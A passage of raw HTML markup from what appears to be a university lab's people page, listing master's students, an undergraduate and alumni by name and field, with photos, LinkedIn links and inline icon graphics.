0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c110\" class=\"style-855 style-local-182-c110 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c111-outer\">\n            <div data-colibri-id=\"182-c111\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c111 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c112\" class=\"d-block style-854 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c112-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c112-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-global-transition-all h-heading style-850 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c113\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-851 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"h-text h-text-component style-902 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c131\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c131 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c138\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c138 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c139-outer\">\n            <div data-colibri-id=\"182-c139\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c139 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c140\" class=\"h-global-transition-all h-heading style-844 style-local-182-c140 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c140\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c132\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c132 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c133-outer\">\n            <div data-colibri-id=\"182-c133\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c133 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c134\" class=\"d-block style-831 style-local-182-c134 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c134-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c134-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c135\" class=\"h-global-transition-all h-heading style-832 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c135\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-text h-text-component style-833 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"style-835 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c141\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c141 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c192\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c192 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c193-outer\">\n            <div data-colibri-id=\"182-c193\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c193 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c194\" class=\"h-global-transition-all h-heading style-926 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c194\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c142\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c142 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c143-outer\">\n            <div data-colibri-id=\"182-c143\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c143 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c144\" class=\"d-block style-913 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c144-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c144-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"h-global-transition-all h-heading style-914 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c145\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c146\" class=\"h-text h-text-component style-915 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"style-917 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c148-outer\">\n            <div data-colibri-id=\"182-c148\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c148 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start 